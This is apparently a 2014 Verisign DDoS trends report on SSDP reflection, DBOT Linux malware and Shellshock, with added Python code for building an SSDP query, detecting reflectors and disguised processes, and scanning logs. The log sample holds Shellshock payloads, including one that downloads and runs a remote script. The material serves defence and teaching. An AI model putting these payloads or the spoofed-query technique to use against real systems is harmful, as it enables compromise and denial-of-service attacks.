Executive Summary
For the period starting July 1, 2014 and ending Sept. 30,
2014, Verisign observed the following key trends:
• Attacks exceeding 10 Gbps in size increased in frequency to
account for more than 20% of all mitigations.
• Attackers were persistent in launching attacks against
targeted customers, averaging more than three separate
attempts per target.
• The most frequently targeted industry this quarter was Media
and Entertainment, representing more than 50% of all
mitigation activity.
• The largest attacks observed this quarter targeted the E-Commerce/Online Advertising industry, the largest peaking at more than 90 Gbps.
Attack Stats
Mitigations by Attack Size:
• Q3 attacks averaged 6.46 Gbps, a 65% increase in average attack size from Q1 2014.
• The number of attacks 10 Gbps and above grew by 38% over Q2.
• Largest volumetric UDP-based attack: 90 Gbps; largest TCP-based attack: more than 30 Gbps.
Mitigations by Vertical:
• Media and Entertainment had the largest volume of attacks, peaking at just over 20 Gbps in Q3.
• E-Commerce/Online Advertising was attacked less frequently, but had the largest attack of the quarter at over 90 Gbps.
Increased Attack Frequency:
• Q3 saw more than three attacks per targeted customer.
Feature: SSDP Used for Reflection Attacks
In Q3 2014, the most common attack type Verisign observed continued to be UDP reflective amplification attacks leveraging the NTP protocol.
As Q3 progressed, Verisign observed the first instances of the Simple Service Discovery Protocol (SSDP) being exploited in DDoS amplification attacks against customers.
Q3 SSDP Attacks:
• The largest SSDP-based attacks in Q3 targeted IT Services and peaked at just under 15 Gbps and 4.58 Mpps.
• Though its amplification factor is smaller than that of DNS or NTP reflection attacks, SSDP attacks can still overwhelm organizations that rely on traditional security appliances for protection.
• Malicious actors spoof the source IP address of the SSDP request so that the replies are directed at the victim.
Mitigation:
• Audit internal assets to ensure that you are not unknowingly being used as a reflector for SSDP-based DDoS attacks.
• For most organizations, SSDP implementations should not need to be reachable from the Internet.
• Inbound queries targeting SSDP (UDP port 1900) can be blocked at the network edge.
What is SSDP?
• A network protocol used for the advertisement and discovery of network services and presence information.
• Most commonly used as the basis of the discovery protocol for Universal Plug-and-Play (UPnP) implementations; it sends and receives information over UDP on port 1900.
• According to ShadowServer (https://ssdpscan.shadowserver.org), more than 15 million vulnerable devices have SSDP enabled and reachable from the Internet.
• Attackers spoof the source IP address of the request to match the intended target; this causes all responding devices to flood the target with SSDP responses.
• The US-CERT alert (https://www.us-cert.gov/ncas/alerts/TA14-017A), referencing an Internet Society article (http://www.internetsociety.org/doc/amplification-hell-revisiting-network-protocols-ddos-abuse), identifies SSDP as having a bandwidth amplification factor of as much as 30.8.
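The following Python script is an added illustration for this report (example code, not Verisign's) that ties the SSDP attack bullets, the Mitigation bullets and the protocol description above together: it builds the M-SEARCH datagram an attacker sends with a spoofed source, parses a device's reply, computes the bandwidth amplification factor the way the Internet Society paper defines it, and scans flow records for hosts replying on UDP/1900 towards a single destination, which is the audit check for "are our devices being used as reflectors". The sample reply, the flow records and the thresholds are constructed for the example.

```python
# Added example for this report (not Verisign's code): SSDP M-SEARCH
# construction, reply parsing, bandwidth amplification factor, and a
# flow-based reflection check.  Reply, flows and thresholds are constructed.
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

SSDP_PORT = 1900
SSDP_MCAST = "239.255.255.250"


def build_msearch(st: str = "ssdp:all", mx: int = 1) -> bytes:
    """UDP payload of an SSDP M-SEARCH request.  'ST: ssdp:all' asks a
    device to answer once per advertised service, which is what an
    attacker sends (with a spoofed source) to maximise reply volume."""
    lines = [
        "M-SEARCH * HTTP/1.1",
        f"HOST: {SSDP_MCAST}:{SSDP_PORT}",
        'MAN: "ssdp:discover"',
        f"MX: {mx}",
        f"ST: {st}",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii")


def parse_ssdp_response(payload: bytes) -> Dict[str, str]:
    """Header block of an 'HTTP/1.1 200 OK' SSDP reply as a dict."""
    text = payload.decode("ascii", errors="replace")
    head = text.split("\r\n\r\n", 1)[0]
    status, *headers = head.split("\r\n")
    if not status.startswith("HTTP/1.1 200"):
        raise ValueError("not an SSDP 200 OK reply: " + status)
    out: Dict[str, str] = {}
    for h in headers:
        name, _, value = h.partition(":")
        out[name.strip().upper()] = value.strip()
    return out


def amplification(request: bytes, replies: Iterable[bytes]) -> float:
    """Bandwidth amplification factor as defined in 'Amplification Hell':
    UDP payload bytes sent to the victim / payload bytes the attacker sent."""
    return sum(len(r) for r in replies) / len(request)


# Constructed reply in the shape a UPnP root device returns (one of the
# several replies a device sends for ST: ssdp:all).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"CACHE-CONTROL: max-age=1800\r\n"
    b"EXT:\r\n"
    b"LOCATION: http://192.168.1.1:49152/rootDesc.xml\r\n"
    b"SERVER: Linux/2.6 UPnP/1.0 MiniUPnPd/1.4\r\n"
    b"ST: upnp:rootdevice\r\n"
    b"USN: uuid:00000000-0000-0000-0000-000000000000::upnp:rootdevice\r\n"
    b"\r\n"
)

Flow = Tuple[str, int, str, int, int, int]  # src, sport, dst, dport, pkts, bytes


def reflection_suspects(flows: Iterable[Flow], min_sources: int = 3,
                        min_pkts: int = 50) -> Dict[str, Tuple[int, int]]:
    """Group UDP traffic whose SOURCE port is 1900 (SSDP replies) by
    destination.  A destination fed replies by many distinct devices is a
    victim; if the replying addresses are ours, our devices are the
    reflectors.  Returns {dst_ip: (distinct_sources, total_pkts)}."""
    per_dst = defaultdict(lambda: [set(), 0])
    for src, sport, dst, _dport, pkts, _bytes in flows:
        if sport == SSDP_PORT:
            per_dst[dst][0].add(src)
            per_dst[dst][1] += pkts
    return {dst: (len(srcs), pkts) for dst, (srcs, pkts) in per_dst.items()
            if len(srcs) >= min_sources and pkts >= min_pkts}


# Constructed flow records: three internal UPnP devices answering a
# spoofed query, plus one legitimate LAN discovery exchange.
SAMPLE_FLOWS: List[Flow] = [
    ("10.0.1.20", 1900, "203.0.113.7", 4444, 900, 250000),
    ("10.0.1.21", 1900, "203.0.113.7", 4444, 870, 241000),
    ("10.0.1.35", 1900, "203.0.113.7", 4444, 910, 252000),
    ("10.0.1.99", 51000, SSDP_MCAST, 1900, 1, 130),      # real M-SEARCH from a LAN host
    ("10.0.1.20", 1900, "10.0.1.99", 51000, 4, 1100),    # its replies
]

if __name__ == "__main__":
    req = build_msearch()
    print(f"M-SEARCH is {len(req)} bytes; one reply is {len(SAMPLE_RESPONSE)} bytes")
    print("BAF for 8 replies to one query:", round(amplification(req, [SAMPLE_RESPONSE] * 8), 1))
    print("SSDP reflection suspects:", reflection_suspects(SAMPLE_FLOWS))
```

The flow check deliberately keys on the source port rather than the destination port: a device that is being abused sends its replies from UDP/1900, so the tell-tale pattern in exported NetFlow/IPFIX is many of your own addresses replying from 1900 to one external host. Feed it real exports with the tuple order shown and tune the thresholds to your traffic.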
DDoS Malware Trends: DBOT Linux DDoS Malware
In Q3, Verisign iDefense analysts discovered a variant of the DBOT backdoor which runs on Unix-like systems
and is primarily used for DDoS attacks.
• Controlled through an Internet Relay Chat (IRC) command-and-control (C&C) channel.
• Sets its process name to look like a common system process (such as syslogd or crond).
• Used not only to perform DDoS attacks, but also includes full reverse-shell access and mail-sending capabilities (e.g., for spam).
• No IP address spoofing currently occurs during execution of any of the built-in DDoS attack commands, meaning most observed attacker IPs will be the bots' real addresses, which speeds up mitigation.
• Its reverse shell allows arbitrary command execution, giving an attacker unlimited ability to manually modify attack patterns or install additional DDoS tools as needed.
• Samples of the malware analyzed by iDefense have an MD5 hash of
579190b74b86f591097b9b6773c1176b.
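Because the DBOT variant hides by renaming itself after a system daemon, the practical host-side check is to compare what a process calls itself with where its binary actually lives. The following is an added example (not iDefense tooling) that flags processes named like common daemons whose executable is outside the usual system directories or was deleted after start; the daemon-name set, the trusted-directory list and the sample process table are assumptions constructed for the example.

```python
# Added example for this report (not iDefense tooling): flag processes
# that call themselves syslogd, crond, etc. but do not run from where the
# genuine daemon's binary lives.  DAEMON_NAMES, TRUSTED_DIRS and
# SAMPLE_PROCS are assumptions constructed for this illustration.
import os
from typing import List, NamedTuple, Optional, Tuple


class Proc(NamedTuple):
    pid: int
    comm: str      # /proc/<pid>/comm: what ps shows, what prctl(PR_SET_NAME) changes
    exe: str       # readlink(/proc/<pid>/exe); '' if unreadable (not root)
    cmdline: str   # /proc/<pid>/cmdline with NULs replaced by spaces


DAEMON_NAMES = {"syslogd", "rsyslogd", "crond", "cron", "sshd", "httpd", "init", "udevd"}
TRUSTED_DIRS = ("/usr/sbin/", "/sbin/", "/usr/bin/", "/bin/",
                "/usr/lib/systemd/", "/lib/systemd/")


def why_suspicious(p: Proc) -> Optional[str]:
    """Reason string if p masquerades as a system daemon, else None."""
    if p.comm not in DAEMON_NAMES:
        return None
    if not p.exe:
        return None                     # cannot verify without privilege; re-run as root
    if p.exe.endswith(" (deleted)"):
        return "binary unlinked after start: " + p.exe
    if not p.exe.startswith(TRUSTED_DIRS):
        return "runs from untrusted path: " + p.exe
    argv0 = p.cmdline.split(" ", 1)[0] if p.cmdline else ""
    if argv0.startswith("/") and argv0 != p.exe:
        return f"argv[0] {argv0} does not match exe {p.exe}"
    return None


def find_masqueraders(procs: List[Proc]) -> List[Tuple[int, str]]:
    out = []
    for p in procs:
        reason = why_suspicious(p)
        if reason:
            out.append((p.pid, reason))
    return out


def snapshot_procfs() -> List[Proc]:
    """Collect the same fields from a live Linux /proc (empty elsewhere)."""
    procs: List[Proc] = []
    if not os.path.isdir("/proc"):
        return procs
    for pid in os.listdir("/proc"):
        if not pid.isdigit():
            continue
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().strip()
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                cmdline = f.read().replace(b"\0", b" ").decode(errors="replace").strip()
            try:
                exe = os.readlink(f"/proc/{pid}/exe")
            except OSError:
                exe = ""
            procs.append(Proc(int(pid), comm, exe, cmdline))
        except OSError:
            continue                    # process exited or not readable
    return procs


# Constructed process table: two genuine daemons, two impostors, a shell.
SAMPLE_PROCS = [
    Proc(612, "rsyslogd", "/usr/sbin/rsyslogd", "/usr/sbin/rsyslogd -n"),
    Proc(731, "crond", "/usr/sbin/crond", "/usr/sbin/crond -n"),
    Proc(4187, "syslogd", "/tmp/.ICE-unix/.x/dbot", "syslogd"),
    Proc(4190, "crond", "/var/tmp/crond (deleted)", "crond"),
    Proc(4203, "sshd", "/usr/sbin/sshd", "/usr/sbin/sshd -D"),
    Proc(5011, "bash", "/bin/bash", "-bash"),
]

if __name__ == "__main__":
    for pid, reason in find_masqueraders(SAMPLE_PROCS):
        print(f"constructed sample: pid {pid}: {reason}")
    for pid, reason in find_masqueraders(snapshot_procfs()):
        print(f"live host: pid {pid}: {reason}")
```

Run it as root so that /proc/<pid>/exe is readable for every process; without privilege the check silently skips other users' processes rather than reporting them as clean.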
DDoS Malware Trends:
“SHELLSHOCK” Used to Deploy Linux DDoS Malware
Verisign iDefense researchers analyzed ELF malware that was observed being delivered via the “Shellshock” Bash vulnerability.
What is Shellshock?
• Common name for a series of critical vulnerabilities in the Bash shell, which ships with a wide array of operating systems.
• Caused by a flaw in the command and argument parser of GNU Bash versions 1.14 through 4.3: when a function definition is imported from an environment variable, commands placed after the definition in that variable are incorrectly executed.
Behavior
• The ELF malware communicates with specific hard-coded C&C servers to receive commands and links to additional malicious content or payloads in the form of raw Pastebin links.
• Attempts logins with a set of commonly used usernames and weak passwords, and launches DDoS attacks.
• Malware samples analyzed by iDefense have an MD5 hash of 5B345869F7785F980E8FF7EBC001E0C7.
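Since the delivery path described above is a crafted HTTP header reaching a CGI script, the detection a responder wants is a scan of web server access logs for the function-definition trigger and the command that followed it. The following is an added example (not iDefense code) over constructed log lines in the common Apache/nginx "combined" layout; it reports the client, the header field that carried the payload, and the trailing command when the payload has the classic CVE-2014-6271 shape.

```python
# Added example for this report (not iDefense code): find Shellshock
# exploitation attempts in web access logs and recover the command the
# attacker tried to run.  SAMPLE_LOG lines are constructed.
import re
from typing import Dict, Iterable, List, Optional

_QUOTED = r'(?:[^"\\]|\\.)*'        # a "..." field, allowing escaped quotes inside
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    rf'"(?P<req>{_QUOTED})" (?P<status>\d{{3}}) \S+ '
    rf'"(?P<ref>{_QUOTED})" "(?P<ua>{_QUOTED})"'
)

# Vulnerable bash executes whatever follows a function definition that
# arrives in an environment variable.  CGI copies request headers into the
# environment (HTTP_USER_AGENT, HTTP_REFERER, ...), so "() {" in any header
# or in the request line is the trigger to look for.
FUNC_DEF = re.compile(r"\(\)\s*\{")
TRAIL_CMD = re.compile(r"\}\s*;\s*(?P<cmd>.+)$")   # classic CVE-2014-6271 form

Hit = Dict[str, Optional[str]]


def inspect(line: str) -> Optional[Hit]:
    """Return a hit record for a log line carrying a Shellshock payload."""
    m = COMBINED.match(line)
    if not m:
        return None                     # not combined format; handle separately
    for field in ("req", "ref", "ua"):
        value = m.group(field)
        if FUNC_DEF.search(value):
            tail = TRAIL_CMD.search(value)
            return {
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "field": field,
                "payload": value,
                "cmd": tail.group("cmd") if tail else None,   # None for later variants
            }
    return None


def scan(lines: Iterable[str]) -> List[Hit]:
    return [hit for hit in map(inspect, lines) if hit]


# Constructed log lines: a 6271-style download-and-run attempt in the
# User-Agent, a benign request, and a later-variant probe in the Referer.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:12:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \\"wget -O /tmp/x http://198.51.100.9/x.sh; sh /tmp/x\\""',
    '198.51.100.23 - - [25/Sep/2014:10:12:07 +0000] "GET / HTTP/1.1" 200 4096 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.9 - - [25/Sep/2014:10:14:55 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 12 '
    '"() { _; } >_[$($())] { echo Content-Type: text/plain; id; }" "-"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} via {hit['field']}: cmd={hit['cmd']!r}")
```

The recovered command is what to pivot on during response: the download host and dropped path in it are the indicators to block and hunt for, and a 200 status on the request means the CGI ran, so the host should be treated as compromised until the payload is accounted for.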
© 2014 VeriSign, Inc. All rights reserved. VERISIGN and other trademarks, service marks, and designs are registered or unregistered trademarks of
VeriSign, Inc. and its subsidiaries in the United States and in foreign countries. All other trademarks are property of their respective owners.